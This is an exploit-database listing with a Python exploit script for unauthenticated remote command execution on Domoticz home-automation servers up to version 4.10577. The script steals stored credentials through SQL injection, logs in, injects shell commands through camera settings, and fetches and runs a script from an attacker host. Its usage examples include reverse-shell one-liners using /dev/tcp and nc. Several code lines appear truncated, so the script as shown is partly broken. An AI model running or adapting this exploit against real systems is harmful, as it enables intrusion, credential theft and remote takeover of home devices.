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Domoticz 4.10577 - Unauthenticated Remote Command Execution Exploit

Fabio Carretto
Security Risk Critical
web applications
Date add
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: Unauthenticated Remote Command Execution on Domoticz <= 4.10577
# Exploit Author: Fabio Carretto @ Certimeter Group
# Vendor Homepage: https://www.domoticz.com/
# Software Link: https://www.domoticz.com/downloads/
# Version: Domoticz <= 4.10577
# Tested on: Debian 9
# CVE: CVE-2019-10664, CVE-2019-10678
# ====================================================================
# Bypass authentication, inject commands and execute them
# Required login page or no authentication (doesn't work with "Basic-Auth" setting)
# There are 3 injection modes. The 1st and the 2nd bypass the char filter:
# 1.Default mode insert the commands in a script and reply with it once to
#   an HTTP request. Set address and port of the attacker host with -H and -P
# 2.(-zipcmd) a zip icon pack will be uploaded. The domoticz installation path
#   can be optionally specified with -path /opt/domoti..
# 3.(-direct) commands executed directly. Characters like & pipe or redirection
#   cannot be used. The execution may block domoticz web server until the end
# Examples:
# ./exploit.py -H -P 2222 'bash -i >& /dev/tcp/ 0>&1 &'
# ./exploit.py -zipcmd http://localhost:8080/ 'nc 4444 -e /bin/bash &'

import argparse
import requests
import urllib
import base64
import json
import BaseHTTPServer
import zipfile
import thread

# Retrieve data from db with the SQL Injection on the public route
def steal_dbdata(field):
    sqlinj = sqlpref % field
    urltmp = url_sqlinj + sqlinj
    r = session.get(urltmp)
    print '[+] %s: %s' % (field,r.text)
    return r.text

# Login and return the SID cookie
def dologin(username, password):
    url_login_cred = url_login % (username, password)
    r = session.get(url_login_cred)
    sid = r.headers['Set-Cookie']
    sid = sid[sid.find('SID=')+4 : sid.find(';')]
    print '[+] SID=' + sid
    return sid

# Search an uvc cam. If exists return its json config
def get_uvc_cam():
    r = session.get(url_camjson)
    cams = json.loads(r.text)
    if cams['status'] == 'OK' and 'result' in cams:
        for cam in cams['result']:
            if cam['ImageURL']=='uvccapture.cgi':
                return cam
    return None

# Prompt the user and ask if continue or not
def prompt_msg(msg):
    print '[+] WARNING: ' + msg
    if not args.f and not raw_input('[+] Continue? [y/N]: ') in ["y","Y"]:
    return None

# Embed the commands in a zip icon file (-zipcmd)
def create_zip(commandsline):
    zipname = 'iconpackfake.zip'
    with zipfile.ZipFile(zipname, 'w') as zip:
        zip.writestr('icons.txt', "fakeicon;Button fakeicon;fake")
        zip.writestr('fakeicon.png', commandsline)
        zip.writestr('fakeicon48_On.png', commandsline)
        zip.writestr('fakeicon48_Off.png', commandsline)
    return zipname

# HTTP server that reply once with the content of the script
class SingleHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    respbody = ""
    def do_GET(self):
        self.send_header('Content-type', 'text/html')
        return None
    def log_request(self, code):

parser = argparse.ArgumentParser(
    description="""Unauthenticated Remote Command Execution on Domoticz!
    (version <= 4.10577) Bypass authentication, inject os commands and execute them!""",
    epilog="""The default mode (1) insert the commands in a script and reply 
    with it once to an HTTP request, use -H address and -P port.
    The -zipcmd (2) or -direct (3) option override the default mode.""")
parser.add_argument('-noexec', action='store_true', help='no cmd injection, just steal credentials')
parser.add_argument('-zipcmd', action='store_true', help='upload a zip icon pack with commands inside (2)')
parser.add_argument('-direct', action='store_true', help='inject commands directly in uvc params (3)')
parser.add_argument('-H', dest='lhost', type=str, help='address/name of attacker host in default mode (1)')
parser.add_argument('-P', dest='lport', type=int, help='tcp port of attacker host in default mode (1)')
parser.add_argument('-path', dest='path', type=str, default='/src/domoticz',
    help='change root path of domoticz to find the uploaded icon(script). Useful only with -zipcmd option')
parser.add_argument('-f', action='store_true', help='shut up and do it')
parser.add_argument('url', metavar='URL', nargs=1, type=str, help='target URL e.g.: http://localhost:8080/')
parser.add_argument('cmd', metavar='cmd', nargs='+', type=str, help='os command to execute, '
    'send it in background or do a short job, the domoticz web server will hang during execution')
args  = parser.parse_args()
if not(args.direct or args.zipcmd) and (args.lhost is None or args.lport is None):
    print '[-] Default mode needs host (-H) and port (-P) of attacker to download the commands'
username = ''
password = ''
cookies = dict()
noauth  = True
sqlpref = 'UNION SELECT sValue FROM Preferences WHERE Key="%s" -- '
cmd = args.cmd
url = args.url[0][:-1] if args.url[0][-1]=='/' else args.url[0]
url_sqlinj  = url + '/images/floorplans/plan?idx=1 '
url_login   = url + '/json.htm?type=command&param=logincheck&username=%s&password=%s&rememberme=true'
url_getconf = url + '/json.htm?type=settings'
url_setconf = url + '/storesettings.webem'
url_iconupl = url + '/uploadcustomicon'
url_camjson = url + '/json.htm?type=cameras'
url_camlive = url + '/camsnapshot.jpg?idx='
url_camadd  = url + '/json.htm?type=command&param=addcamera&address=' \
cmd_zipicon = ['chmod 777 %s/www/images/fakeicon48_On.png' % args.path,
    '%s/www/images/fakeicon48_On.png' % args.path]
cmd_default = ['curl %s -o /tmp/myexec.sh -m 5', 'chmod 777 /tmp/myexec.sh', '/tmp/myexec.sh']

session = requests.Session()
r = session.get(url_getconf)
if r.status_code == 401:
    noauth = False
    username = steal_dbdata('WebUserName')
    password = steal_dbdata('WebPassword')
    cookies['SID'] = dologin(username, password)
    r = session.get(url_getconf)
if args.noexec is True:
settings = json.loads(r.text)
settings.pop('UVCParams', None)
# Fix necessary to not break or lose settings
chn = {'WebTheme':'Themes','UseAutoBackup':'enableautobackup','UseAutoUpdate':'checkforupdates'}
for k in chn:
    settings[chn[k]] = settings.pop(k, None)
sub = settings.pop('MyDomoticzSubsystems', 0)
if sub >= 4:
    settings['SubsystemApps'] = 4; sub -= 4
if sub >= 2:
    settings['SubsystemShared'] = 2; sub -= 2
if sub == 1:
    settings['SubsystemHttp'] = 1  
    settings['HTTPURL'] = base64.b64decode(settings['HTTPURL'])
    settings['HTTPPostContentType'] = base64.b64decode(settings['HTTPPostContentType'])
    settings['Latitude'] = settings['Location']['Latitude']
    settings['Longitude'] = settings['Location']['Longitude']
    settings.pop('Location', None)
toOn  = ['allow','accept','hide','enable','disable','trigger','animate','show']
toOn += ['usee','floorplanfullscreen','senderrorsasn','emailasa','checkforupdates']
for k in [x for x in settings if any([y for y in toOn if y in x.lower()])]:
    if(str(settings[k]) == '1'):
        settings[k] = 'on'
    elif(str(settings[k]) == '0'):
        settings.pop(k, None)

cmdwrap = '\n'.join(['#!/bin/bash'] + cmd)
payload = urllib.urlencode(settings) + '&'
if cmd[-1][-1] != '&' and not args.direct:
    prompt_msg('if not sent in background the commands may block domoticz')
if args.direct:
    prompt_msg('in direct mode & pipe redirect are not allowed (may block domoticz)')
elif args.zipcmd:
    fakezip = create_zip(cmdwrap)
    files = [('file',(fakezip, open(fakezip,'rb'), 'application/zip'))]
    r = session.post(url_iconupl, files=files)
    cmd = cmd_zipicon
    httpd = BaseHTTPServer.HTTPServer(("", args.lport), SingleHandler)
    SingleHandler.respbody = cmdwrap
    thread.start_new_thread(httpd.handle_request, ())
    cmd_default[0] = cmd_default[0] % ('http://%s:%d/' % (args.lhost,args.lport))
    cmd = cmd_default
# Encode the space and send the others in clear (chars like <>&;| not allowed)
cmdencode = '\n'.join([x.replace(' ', '+') for x in cmd])
payload += 'UVCParams=-d+/dev/aaa\n%s\n#' % (cmdencode)
req = requests.Request('POST', url_setconf, data=payload, cookies=cookies)
r = session.send(req.prepare())
print '[+] Commands successfully injected'

if noauth:
    session.cookies.clear() # fix if authentication is disabled
cam = get_uvc_cam()
if cam is None:
    print '[+] Adding new UVC camera'
    r = session.get(url_camadd)
    cam = get_uvc_cam()
print '[+] Execution on cam with idx: ' + str(cam['idx'])
r = session.get(url_camlive + str(cam['idx']))
# Restore the default UVC parameters (like a ninja)
settings['UVCParams'] = '-S80 -B128 -C128 -G80 -x800 -y600 -q100'
session.post(url_setconf, data=settings)
print '[+] Done! Restored default uvc params!'

#  0day.today [2024-11-15]  #